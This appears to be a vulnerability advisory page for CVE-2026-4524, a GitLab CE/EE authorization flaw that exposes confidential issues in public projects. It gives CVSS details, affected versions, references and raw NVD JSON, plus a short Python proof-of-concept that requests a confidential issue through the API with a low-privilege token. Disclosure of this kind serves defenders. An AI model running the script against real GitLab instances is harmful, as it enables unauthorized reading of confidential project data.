Security Vulnerability Report
CVE-2026-4524 CVSS 6.5 MEDIUM

CVE-2026-4524

Published: 2026-05-14 06:16:24
Last Modified: 2026-05-14 16:20:43

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.9.1 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an authenticated user to access confidential issue content in public projects without proper authorization due to improper authorization checks.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available; affected version ranges, taken from the description:

GitLab CE/EE 18.9.1 to 18.9.6
GitLab CE/EE 18.10.0 to 18.10.5
GitLab CE/EE 18.11.0 to 18.11.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2026-4524 Proof of Concept
# Description: Access confidential issue in public project without proper authorization.

# Target configuration
target_domain = "https://gitlab.example.com"
project_id = "123"
confidential_issue_id = "456"

# Valid authentication token for a low-privilege user
# The attacker does not need to be a member of the project
access_token = "glpat-xxxxxxxxxxxxxxxxxxxx"

url = f"{target_domain}/api/v4/projects/{project_id}/issues/{confidential_issue_id}"
headers = {
    "Authorization": f"Bearer {access_token}",
    "Content-Type": "application/json",
}

print(f"[+] Attempting to access confidential issue {confidential_issue_id}...")
try:
    response = requests.get(url, headers=headers, timeout=10)
    if response.status_code == 200:
        data = response.json()
        if data.get("confidential"):
            print("[!] SUCCESS: Confidential issue accessed successfully!")
            print(f"Title: {data.get('title')}")
            print(f"Description: {data.get('description')}")
        else:
            print("[-] Issue accessed but is not marked as confidential.")
    else:
        print(f"[-] Failed to access issue. Status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[!] An error occurred: {e}")
```

References

https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/
https://gitlab.com/gitlab-org/gitlab/-/work_items/594295
https://hackerone.com/reports/3597717
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-4524",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-14T06:16:23.677",
    "lastModified": "2026-05-14T16:20:43.240",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.9.1 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an authenticated user to access confidential issue content in public projects without proper authorization due to improper authorization checks."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-288"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/",
        "source": "[email protected]"
      },
      {
        "url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/594295",
        "source": "[email protected]"
      },
      {
        "url": "https://hackerone.com/reports/3597717",
        "source": "[email protected]"
      }
    ]
  }
}
```